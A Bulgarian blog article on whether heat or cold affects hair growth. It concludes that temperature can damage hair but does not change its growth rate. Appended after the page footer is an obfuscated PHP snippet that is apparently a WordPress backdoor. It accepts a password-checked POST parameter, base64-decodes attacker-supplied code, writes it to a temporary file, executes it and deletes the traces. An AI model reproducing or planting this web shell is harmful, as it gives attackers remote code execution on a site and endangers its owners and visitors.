Влияе ли температурата върху растежа на косата? | Косопад

Влияе ли температурата върху растежа на косата?

kosa-presa

Температурата без съмнение влияе върху здравето и външния вид на косата: дали студения или топъл климат, дали употребата на уреди. Но няма категорични доказателства, че температурата променя растежа на косата, който е средно с 1 – 1, 2 см на месец. Трябва обаче да имаме предвид някои от температурните влияния, които могат да повлияят на състоянието на косата ни:

Високи температури

По принцип високите температури правят косата лесно късаща се, увредена и с отворени връхчета. Най- често източник на такива високи градуси е продължителното използване на уреди като сешоар, преса и маша. Дори да ги използваме правилно, с времето могат да имат негативен ефект. От друга страна, топлината стимулира кръвообращението в скалпа и може да причини лющене на кожата, отваряне на кутикулата. Високите температури могат да увредят косата, но по принцип не засягат скоростта на растеж на косата.

kosa-prez-zima

Ниски температури

Студът също може да влияе върху косата. Понякога може да намали ефекта от химиотерапията и третирането с лекарства, свързано с косата. Намалява кръвообращението в космените фоликули. Студеният въздух може да направи косата по- късаща се, суха, увеличава статичното електричество. Въпреки че някои хора твърдят, че косата расте по- бързо през студените месеци, това не е научно доказано.

04. април 2015 12:32:26 от Надя Колева
Категории: Косопад – Статии | Етикети: , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}